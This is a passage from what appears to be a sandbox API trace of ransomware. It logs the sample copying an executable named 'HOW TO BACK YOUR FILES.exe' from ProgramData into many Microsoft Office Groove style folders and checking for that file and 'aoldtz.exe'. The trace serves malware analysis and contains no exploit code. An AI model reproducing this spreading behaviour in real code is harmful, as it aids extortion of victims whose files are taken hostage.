(normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.408] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.408] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5aad71f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c10a8a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c10a8a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.408] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.408] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.408] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate" [0071.408] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d4408 | out: hHeap=0x2b0000) returned 1 [0071.408] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2820 | out: hHeap=0x2b0000) returned 1 [0071.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate") returned 100 [0071.408] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate" [0071.408] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.408] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slate\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.412] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.412] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a9f29b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c10a8a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c10a8a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.413] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.413] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.413] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis" [0071.413] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d4330 | out: hHeap=0x2b0000) returned 1 [0071.413] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2800 | out: hHeap=0x2b0000) returned 1 [0071.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis") returned 100 [0071.413] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis" [0071.413] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.413] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\oasis\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.418] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.418] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Oasis\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c130a00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c130a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.418] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.418] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.418] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Lime", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Lime") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Lime" [0071.418] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0071.418] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d27e0 | out: hHeap=0x2b0000) returned 1 [0071.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Lime") returned 99 [0071.418] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Lime" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Lime") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Lime" [0071.418] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.418] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Lime\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\lime\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.423] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.423] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Lime\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x568309f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c130a00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c130a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.423] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.423] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.423] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck" [0071.423] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc840 | out: hHeap=0x2b0000) returned 1 [0071.423] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d27c0 | out: hHeap=0x2b0000) returned 1 [0071.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck") returned 104 [0071.423] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck" [0071.423] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.423] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\graycheck\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.428] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.428] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GrayCheck\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52c3bfd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c130a00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c130a00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.428] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.428] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.429] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert" [0071.429] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d4258 | out: hHeap=0x2b0000) returned 1 [0071.429] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d27a0 | out: hHeap=0x2b0000) returned 1 [0071.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert") returned 101 [0071.429] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert" [0071.429] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.429] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\desert\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.433] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.433] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Desert\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51da7910, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c156b60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c156b60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.433] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.433] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.434] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow" [0071.434] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc760 | out: hHeap=0x2b0000) returned 1 [0071.434] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2780 | out: hHeap=0x2b0000) returned 1 [0071.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow") returned 107 [0071.434] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow" [0071.434] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.434] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\brightyellow\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.439] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.439] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightYellow\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a87c30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c156b60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c156b60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.440] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.440] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.440] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange" [0071.440] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e87c0 | out: hHeap=0x2b0000) returned 1 [0071.440] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2760 | out: hHeap=0x2b0000) returned 1 [0071.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange") returned 107 [0071.440] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange" [0071.440] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.440] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\brightorange\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.446] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.446] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BrightOrange\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a87c30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c17ccc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c17ccc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.446] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.446] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.446] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Biscay", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Biscay") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Biscay" [0071.446] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d4180 | out: hHeap=0x2b0000) returned 1 [0071.446] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2740 | out: hHeap=0x2b0000) returned 1 [0071.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Biscay") returned 101 [0071.446] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Biscay" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Biscay") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Biscay" [0071.446] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.446] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Biscay\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\biscay\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.451] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.451] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Biscay\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x519a33f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c17ccc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c17ccc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.451] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.451] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.451] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue" [0071.451] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40a8 | out: hHeap=0x2b0000) returned 1 [0071.451] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2720 | out: hHeap=0x2b0000) returned 1 [0071.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue") returned 103 [0071.451] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue" [0071.451] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.451] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\babyblue\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.456] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.456] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c17ccc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c17ccc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.456] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.456] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.456] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Americana", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Americana") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Americana" [0071.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, 